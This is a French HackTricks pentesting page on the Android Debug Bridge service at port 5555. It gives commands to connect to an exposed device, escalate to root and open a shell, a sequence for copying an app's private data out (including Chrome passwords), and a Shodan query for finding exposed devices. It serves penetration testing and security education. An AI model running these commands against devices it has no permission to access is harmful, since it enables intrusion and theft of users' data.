4.2 KiB
5555 - Android Debug Bridge
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks:
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFT
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.
Informations de base
D'après la documentation:
Android Debug Bridge (adb) est un outil polyvalent en ligne de commande qui vous permet de communiquer avec un appareil. La commande adb facilite une variété d'actions sur l'appareil, telles que l'installation et le débogage d'applications, et elle fournit un accès à un shell Unix que vous pouvez utiliser pour exécuter diverses commandes sur un appareil.
Port par défaut: 5555.
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
Connect
Si vous trouvez le service ADB fonctionnant sur un port d'un appareil et que vous pouvez vous y connecter, vous pouvez obtenir un shell à l'intérieur du système :
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
Pour plus de commandes ADB, consultez la page suivante:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}
Dump des données de l'application
Pour télécharger complètement les données d'une application, vous pouvez:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
Vous pouvez utiliser ce stratagème pour récupérer des informations sensibles comme les mots de passe Chrome. Pour plus d'informations à ce sujet, consultez les informations et les références fournies ici.
Shodan
android debug bridge
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.